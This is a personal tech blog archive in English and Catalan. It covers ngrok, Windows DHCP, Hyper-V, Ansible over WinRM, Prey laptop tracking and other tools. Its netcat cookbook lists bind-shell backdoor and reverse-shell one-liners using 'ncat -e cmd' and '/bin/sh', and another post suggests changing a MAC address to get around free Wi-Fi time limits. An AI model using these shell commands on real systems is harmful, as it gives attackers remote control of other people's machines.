Jan 24

ngrok – service which solve services behind NAT issues

Reading time: < 1 minute This is another short entry, in this case for recommending a service which we solve typical problem solved using a DNAT. Once we have a service on our laptop, or on a private server and we have to expose that service on the internet for some time or permanently usually we have to go the firewall, or router and create a NAT rule forwarding a port. This is a simple and powerful service which is going to solve that for you. There is a free account for understanding and testing the service, other plans are available and especially affordable for professional requirements.


I was frogetting to say it’s compatible with Linux, Windows and Mac.

Jan 19

DHCP server for Windows 10

Reading time: 1 – 2 minutes

This is a super useful and simple tool, first of all, let me say thanks to Dani because I found the tool thanks to him. Very often I have the requirement to set up small virtual, real or hybrid networks using my laptop as a server and I had to boot a VM for getting a DHCP server simple to manage and powerful. Now, this is not required anymore because thanks to this tool I found a super small and flexible tool, I can set up all that I need using an INI file or just a wizard. It’s a pleasure and I don’t have to install anything if I don’t want, just a tray icon application is running for allowing me to give the service to my experimental networks.

Those projects that gain my commitment in a second: DHCP Server for Windows

Oct 20

Windows 10: enable/disable Hyper-V from CLI

Reading time: < 1 minute Assuming we're running a Windows shell with administrator privileges, using next commands is possible to enable, or disable, Hyper-V. In my case this is needed because when Hyper-V is running Virtualbox only can run 32bit virtual machines. I require Microsoft VM manager Hyper-V because I also run Docker for Windows and it's a requirement.

#enable Hyper-V
dism.exe /Online /Enable-Feature:Microsoft-Hyper-V /All

#disable Hyper-V
dism.exe /Online /Disable-Feature:Microsoft-Hyper-V
Feb 12

X files: mouse pointer starts moving by itself

Reading time: 2 – 3 minutes

It seems a jog but it’s true, after buying my Toshiba Portégé Z30-A-180 PT243 I was so proud about the performance and laptop features. By default it was running a Windows 7 and after some months of using mouse pointer started moving drawing a diagonal in the screen there wasn’t a stela just a diagonal movement and during that automatic movement there were no way to get mouse control. New Toshiba laptops has a touchpad and a trackpoint a none of them was responding while that happened. Because that only happens time to time I didn’t pay attention to the problem.

Toshiba Portégé - Trackpoint and Touchpad

Last Christmas holidays I updated the laptop to Windows 10, and I was very happy to see how 99.9% of applications and configurations was maintained and running perfectly. But after some weeks mouse pointer movements return to my life, some times very often and some times less usual. But one afternoon I was totally desperate with that issue and I decided to look it up on Google. I found a thread on Toshiba support forum where more people was talking about the same issue. Proposed solutions are not perfect but helpful for me, they talk about a static electricity problem that affects trackpoint and the best option is disable it to forget the problem. Luckly I don’t use trackpoint because for me touchpad is more confortable and disable trackpoint is good enough solution in my case.

So if you have automatic mouse movements in Toshiba Portégé Z30 disable the trackpoint, don’t forget that Toshiba refers to that device as a Accupoint. Below you have a capture of the instructions to do that:

Disable Accupoint II

Disable Accupoint

I hope this blog entry has been so helpful as it has been for me.

Jan 29

Ansible and Windows Playbooks

Reading time: 3 – 5 minutes

Firstly let me introduce a Windows service called: “Windows Remote Manager” or “WinRM”. This is the Windows feature that allows remote control of Windows machines and many other remote functionalities. In my case I have a Windows 7 laptop with SP1 and PowerShell v3 installed.

Secondly don’t forget that Ansible is developed using Python then a Python library have to manage the WinRM protocol. I’m talking about “pywinrm“. Using this library it’s easy to create simple scripts like that:

#!/usr/bin/env python

import winrm

s = winrm.Session('', auth=('the_username', 'the_password'))
r = s.run_cmd('ipconfig', ['/all'])
print r.status_code
print r.std_out
print r.std_err

This is a remote call to the command “ipconfig /all” to see the Windows machine network configuration. The output is something like:

$ ./winrm_ipconfig.py 

Windows IP Configuration

   Host Name . . . . . . . . . . . . : mini7w
   Primary Dns Suffix  . . . . . . . : 
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : ymbi.net

Ethernet adapter GigaBit + HUB USB:

   Connection-specific DNS Suffix  . : ymbi.net
   Description . . . . . . . . . . . : ASIX AX88179 USB 3.0 to Gigabit Ethernet Adapter
   Physical Address. . . . . . . . . : 00-23-56-1C-XX-XX
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::47e:c2c:8c25:xxxx%103(Preferred) 
   IPv4 Address. . . . . . . . . . . : 
   Subnet Mask . . . . . . . . . . . :
   Lease Obtained. . . . . . . . . . : mi�rcoles, 28 de enero de 2015 12:41:41
   Lease Expires . . . . . . . . . . : mi�rcoles, 28 de enero de 2015 19:17:56
   Default Gateway . . . . . . . . . :
   DHCP Server . . . . . . . . . . . :
   DHCPv6 IAID . . . . . . . . . . . : 2063606614
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-15-F7-BF-36-xx-C5-xx-03-xx-xx
   DNS Servers . . . . . . . . . . . :
   NetBIOS over Tcpip. . . . . . . . : Enabled

Of course, it’s possible to run Powershell scripts like the next one which shows the system memory:

$strComputer = $Host
$RAM = WmiObject Win32_ComputerSystem
$MB = 1048576

"Installed Memory: " + [int]($RAM.TotalPhysicalMemory /$MB) + " MB"

The Python code to run that script is:

#!/usr/bin/env python

import winrm

ps_script = open('scripts/mem.ps1','r').read()
s = winrm.Session('', auth=('the_username', 'the_password'))
r = s.run_ps(ps_script)
print r.status_code
print r.std_out
print r.std_err

and the output:

$ ./winrm_mem.py 
Installed Memory: 2217 MB

In the end it’s time to talk about how to create an Ansible Playbook to deploy anything in a Windows machine. As always the first thing that we need is a hosts file. In the next example there are several ansible variables needed to run Ansible Windows modules on WinRM, all of them are self-explanatory:


ansible_ssh_port=5985 #winrm (non-ssl) port

The first basic example could be a simple playbook that runs the ‘ipconfig’ command and registers the output in an Ansible variable to be showed later like a debug information:

- name: test raw module
  hosts: all
    - name: run ipconfig
      raw: ipconfig
      register: ipconfig
    - debug: var=ipconfig

The command and the output to run latest example:

$ ansible-playbook -i hosts ipconfig.yml 

PLAY [test raw module] ******************************************************** 

GATHERING FACTS *************************************************************** 
ok: []

TASK: [run ipconfig] ********************************************************** 
ok: []

TASK: [debug var=ipconfig] **************************************************** 
ok: [] => {
    "ipconfig": {
        "invocation": {
            "module_args": "ipconfig", 
            "module_name": "raw"
        "rc": 0, 
        "stderr": "", 
        "stdout": "\r\nWindows IP Configuration\r\n\r\n\r\nEthernet adapter GigaBit 

PLAY RECAP ********************************************************************                  : ok=3    changed=0    unreachable=0    failed=0 

As always Ansible have several modules, not only the ‘raw’ module. I committed two examples in my Github account using a module to download URLs and another one that runs Powershell scripts.

My examples are done using Ansible 1.8.2 installed in a Fedora 20. But main problems I’ve found are configuring Windows 7 to accept WinRM connections. Next I attach some references that helped me a lot:

If you want to use my tests code you can connect to my Github: Basic Ansible playbooks for Windows.

Aug 28

Technitium MAC Address Changer

Reading time: 1 – 2 minutes

I just want to share with you a small and powerful Windows tool I found in my last trip to US. The best feature IMHO is that permits to change the MAC address of your NIC interface without rebooting, safely and fast. It could be useful when you have a limit time to connect to internet in a free Wi-Fi network; after changing your MAC address you should be like a new device. If you have to do something like this, remember to remove the browser cookies.

Other interesting features of this tool is network presets. You can change your NIC settings very fast just changing a preset profile. As you can see in next screenshot it has a simple chart of your real time network traffic. And finally I want to stand out you can see all your network devices configuration very fast.

technitium MAC address changer screenshot

Technitium MAC Address Changer home page.

Nov 18

Seesmic – el meu portal cap a les aplicacions socials

Reading time: 2 – 2 minutes

Potser a alguns els semblarà rara la recomanació d’una aplicació per Windows i encara més si aquesta esta fet amb Silverlight. Però he de reconeixer que a mi m’esta resultat una eina força còmode.

Perquè l’utilitzo:

  • Des d’una sola eina i amb una sola línia de temps veig:
    • twitter
    • facebook
    • linked.in
    • google buzz
  • Obviament puc, fer tot tipus d’accions sobre cada una de les entrades vingui d’on vingui el contingut. O sigui, comentaris, retweets, preview d’imatges, informació dels usuarios, etc.
  • També puc escoltar last.fm des de la mateixa aplicació i compartir la informació de les cançons que escolto quan m’interessa.
  • S’actualitzen en temps real les línies de temps de les diferents eines, via streams.
  • També puc postejar sobre quasevol de les xarxes socials o fins hi tot sobre totes a la vegada.

Per acabar un parell d’screenshots perquè ús feu una idea del seu aspecte, el primer és la finestra de l’aplicació tal qual la faig correr jo:

el segon és l’aplicació a ‘full-screen’:

Pàgina web de l’aplicació: Seesmic, l’eina esta disponible també com a plug-in d’un munt de navegadors i de quasi tots els sistemes operatius mòbils moderns.

Oct 12

Prey – rastrejar el portàtil i el lladre

Reading time: 2 – 4 minutes

prey logoQuan ens roben el portàtil l’únic que ens queda fer és resar perquè siguem realistes, és molt poc provable que la policia el trobi. Així doncs, el que preten fer prey és enviar-nos tota la informació possible del portàtil després de que ens l’hagin robat.

El seu funcionament és força simple, però al mateix temps s’ha de dir que la idea sembla força eficient. En la versió per linux es tracta d’un script fet amb perl que es col·loca al crontab, de forma que cada x’s minuts es connecta a una URL del servidor de prey o del nostre propi servidor. Aquest URL sovint respon dient que tot va bé, és a dir, que el portàtil no ha estat marcat com a robat. En cas contrari, el servidor respon via HTTP dient que el dispositiu ha estat robat. En aquest moment és quan l’script es posa a treballar i es posa a recollir tot tipus d’informació per reportar-la a la pàgina web:

  • geolocalització per GPS o Wifi, si no disposem de GPS. He provat la localització per wifi i va força bé.
  • fa fotos amb la webcam del portàtil i captures de pantalla
  • reporta tota la informació que pot sobre processos que hi ha corrent al sistema, rutes, informació de les wifis veïnes, etc.
  • també podem fer sonar alarmes, borrar informació remotament, que ens enviï alguns arxius abans de ser borrats,etc.
  • a més els reports que es van reben queden arxivats en una interficie força amigable i molt senzilla d’usar
  • a més el software d’auto-actualitza

La compte gratuïta que ofereix la pàgina web permet tracejar fins a 3 dispositius, obviament si usem el nostre propi servidor HTTP podrem tracejar tots els dispositius que volem. Si volem usar més dispositius haurem d’adquirir una compte professional que tampoc sembla massa cara: per exemple, la més econòmica és la de 12€/mes que permet controlar fins a 10 dispositius amb un màxim de 25 informes per cada dispositiu.

Jo he provat la versió de Windows i la de Linux i ambdues m’han funcionat força bé a la primera, però pel que posa a la web també tenen la versió de Mac i la d’Android. Aquest última diria que és molt nova. Malgrat això en els meus dos Androids no uso prey sinó que uso WaveSecure. Pensat especialment per a dispostius mòbils, ja que tenen versions per: Blackberry, Symbian, Windows phone, Java i Android, és clar.

May 31

netcat – cookbook

Reading time: 2 – 3 minutes

  • client TCP, en aquest cas HTTP
C:\client>ncat google.com 80
GET / HTTP/1.1
  • client telnet:
C:\client>ncat -t 23
  • simula un servidor TCP/HTTP molt simple:
C:\server>ncat -l 80 < stuff.txt
C:\client>ncat localhost 80

C:\server>ncat -l --keep-open 80 < stuff.txt
C:\client>ncat localhost 80
  • servidor UDP:
C:\server>ncat -l 74 --udp
C:\client>ncat --udp localhost 74 < stuff.txt
  • es pot especificar el port i IP origen a usar:
C:\client>ncat www.irongeek.com 80 -p 80 -s
C:\client>ncat www.irongeek.com 80 -p 80 -s
  • interconnecta clients, ‘proxy-tcp’
C:\server>ncat -l 74
C:\client1>ncat localhost 74
C:\client2>ncat localhost 74

C:\server>ncat -l 74 --broker
C:\client1>ncat localhost 74
C:\client2>ncat localhost 74
  • servidor de ‘chat’ molt simple
C:\server>ncat -l 74 --chat
C:\client1>ncat localhost 74
C:\client2>ncat localhost 74
  • client TCP+SSL:
C:\client>ncat gmail.google.com 443 --ssl
GET / HTTP/1.1
  • transmissió de fitxers via TCP+SSL:
C:\server>ncat.exe -l --ssl 74 --send-only < ncat.exe
C:\client>ncat localhost 74 --ssl > out2.exe
(ends self)

C:\client>ncat --ssl -vvv -l > newfile
C:\server>ncat -v --send-only --ssl localhost < ncat.exe
(Good for getting around NAT)
  • proxy molt simple:
C:\ncat>ncat -l 8080 --proxy-type http --proxy-auth adc:test --ssl
  • shell amb backdoor:
    • Linux:
ncat -l 23 -e /bin/sh
C:\server>ncat 23
    • Windows:
C:\server>ncat -l 23 -e cmd
ncat 23
  • Reverse Shell (aka: Shovel Shell)
C:\server>ncat -l 74
C:\client>ncat 74 -e cmd
  • netcat relay
C:\ncat>ncat -l localhost 80 --sh-exec "ncat google.com 80 -o text.txt -x hex.txt"
May 21

HTC Polaris: mantenir wifi:on quan estem en standby/suspend

Reading time: 1 – 2 minutes

Sobretot quan tinc la HTC Touch Cruise (Polaris) a la dock station i connectada via Wi-Fi amb algún dels ordinadors de casa és realment un problema que s’apagui per timeout del standy o el suspend i per molt gran que posem aquests números sempre s’apaga quan menys t’ho esperes.

Després de donar un tomb pels forums d’XDA-Developers he trobat un thread que m’ha donat la solució. Tan senzilla com modificar el registre amb aquests valors:

HKEY_LOCAL_MACHINESystemCurrentControlSetContro  lPowerStateSuspend{98C5250D-C29A-4985-AE5F-AFE5367E5006}
-change (Default) DWORD Dec to 1
HKEY_LOCAL_MACHINESystemCurrentControlSetContro  lPowerStateResuming{98C5250D-C29A-4985-AE5F-AFE5367E5006}
-change (Default) DWORD Dec to 1
HKEY_LOCAL_MACHINESystemCurrentControlSetContro  lPowerStateUnattended{98C5250D-C29A-4985-AE5F-AFE5367E5006}
-change (Default) DWORD Dec to 1
If you need to change it back, the default entry for all of them
(at least on my Cruise) was set to 4

Realment senzill d’aplicar i fins hi tot sense reiniciar funciona perfectament.